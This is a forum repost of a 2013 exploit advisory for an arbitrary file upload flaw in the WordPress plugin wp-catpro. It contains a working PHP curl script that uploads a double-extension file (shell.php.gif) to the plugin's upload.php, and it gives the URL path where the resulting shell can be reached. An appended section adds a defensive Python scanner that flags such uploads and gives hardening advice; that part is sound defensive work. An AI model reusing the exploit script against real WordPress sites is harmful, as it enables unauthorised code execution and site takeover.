China Network Penetration Testing Alliance

Title: WordPress plugin wp-catpro arbitrary file upload

Author: admin    Time: 2013-2-27 20:12
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif

<?php
phpinfo();
?>
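
An added example, not part of the original post or of the plugin's code: a Python audit of an uploads directory such as wp-content/uploads/catpro/ that flags files like the .php.gif upload described above, which a check of only the last extension accepts. The script-extension list, the function names and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile

ALLOWED_EXT = {"jpg", "gif", "png"}  # allowlist quoted in the advisory
# Assumption: extensions a web server may map to the PHP handler
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}
MAGIC = {"jpg": (b"\xff\xd8\xff",), "gif": (b"GIF87a", b"GIF89a"),
         "png": (b"\x89PNG\r\n\x1a\n",)}

def check_upload(name, data):
    """Return the reasons a file is suspicious; an empty list means plain image."""
    reasons = []
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext not in ALLOWED_EXT:
        reasons.append("extension not in allowlist")
    # A last-extension check accepts shell.php.gif, so inspect inner segments too.
    if any(p in SCRIPT_EXT for p in parts[1:-1]):
        reasons.append("script extension inside file name")
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        reasons.append("content does not match image signature")
    if re.search(rb"<\?(php|=)", data, re.I):
        reasons.append("PHP open tag in content")
    return reasons

def audit_dir(root):
    """Walk an uploads directory; map each flagged relative path to its reasons."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                head = fh.read(65536)  # the first 64 KiB is enough for these checks
            reasons = check_upload(fn, head)
            if reasons:
                flagged[os.path.relpath(path, root)] = reasons
    return flagged

if __name__ == "__main__":
    # Constructed sample files standing in for wp-content/uploads/catpro/
    samples = {"logo.gif": b"GIF89a\x01\x00\x01\x00",
               "random_name.php.gif": b"<?php\nphpinfo();\n?>"}
    with tempfile.TemporaryDirectory() as d:
        for n, b in samples.items():
            with open(os.path.join(d, n), "wb") as fh:
                fh.write(b)
        for path, why in sorted(audit_dir(d).items()):
            print(path, "->", "; ".join(why))
```

The same three checks (every name segment, image signature, PHP open tag) belong in the upload handler itself, together with server configuration that does not execute scripts from the uploads directory.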



